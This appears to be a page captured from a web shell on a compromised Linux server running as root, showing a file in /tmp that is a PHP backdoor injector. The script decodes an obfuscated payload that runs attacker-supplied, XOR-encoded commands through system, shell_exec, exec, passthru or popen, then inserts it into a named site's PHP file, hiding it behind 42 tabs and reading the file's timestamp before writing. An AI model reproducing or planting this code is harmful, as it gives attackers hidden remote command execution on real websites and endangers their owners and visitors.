HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
$ pwd: /tmp/
Upload Files
File: //tmp/.locked
<?php  $path = '/var/www/html/potencialactivo.sumar.com.py/public/vendor/adminlte/dist/css/lib.cat.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24token_parser_engine4%20%3D%20%22%5Cx70a%5Cx73s%5Cx74h%5Cx72u%22%3B%20%24token_parser_engine2%20%3D%20%22%5Cx73h%5Cx65%5Cx6Cl%5Cx5F%5Cx65xec%22%3B%20%24unit_converter%20%3D%20%22%5Cx68ex2%5Cx62i%5Cx6E%22%3B%20%24token_parser_engine6%20%3D%20%22%5Cx73%5Cx74ream_get_con%5Cx74%5Cx65nts%22%3B%20%24token_parser_engine1%20%3D%20%22syste%5Cx6D%22%3B%20%24token_parser_engine5%20%3D%20%22p%5Cx6Fpe%5Cx6E%22%3B%20%24token_parser_engine3%20%3D%20%22e%5Cx78e%5Cx63%22%3B%20%24token_parser_engine7%20%3D%20%22pcl%5Cx6Fs%5Cx65%22%3B%20if%20%28isset%28%24_POST%5B%22r%5Cx65f%22%5D%29%29%20%7B%20function%20system_core%20%28%20%24itm%20%2C%20%24key%20%29%20%7B%20%24flg%20%3D%20%27%27%20%3B%20for%28%24p%3D0%3B%20%24p%3Cstrlen%28%24itm%29%3B%20%24p%2B%2B%29%7B%24flg.%3Dchr%28ord%28%24itm%5B%24p%5D%29%5E%24key%29%3B%7D%20return%20%24flg%3B%20%7D%20%24ref%20%3D%20%24unit_converter%28%24_POST%5B%22r%5Cx65f%22%5D%29%3B%20%24ref%20%3D%20system_core%28%24ref%2C%2061%29%3B%20if%20%28function_exists%28%24token_parser_engine1%29%29%20%7B%20%24token_parser_engine1%28%24ref%29%3B%20%7D%20elseif%20%28function_exists%28%24token_parser_engine2%29%29%20%7B%20print%20%24token_parser_engine2%28%24ref%29%3B%20%7D%20elseif%20%28function_exists%28%24token_parser_engine3%29%29%20%7B%20%24token_parser_engine3%28%24ref%2C%20%24mrk_itm%29%3B%20print%20join%28%22%5Cn%22%2C%20%24mrk_itm%29%3B%20%7D%20elseif%20%28function_exists%28%24token_parser_engine4%29%29%20%7B%20%24token_parser_engine4%28%24ref%29%3B%20%7D%20elseif%20%28function_exists%28%24token_parser_engine5%29%20%26%26%20function_exists%28%24token_parser_engine6%29%20%26%26%20function_exists%28%24token_parser_engine7%29%29%20%7B%20%24key_flg%20%3D%20%24token_parser_engine5%28%24ref%2C%20%27r%27%29%3B%20if%20%28%24key_flg%29%20%7B%20%24parameter_group_pointer%20%3D%20%24token_parser_engine6%28%24key_flg%29%3B%20%24token_parser_engine7%28%24key_flg%29%3B%20print%20%24parameter_group_pointer%3B%20%7D%20%7D%20exit%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');
@ Telegram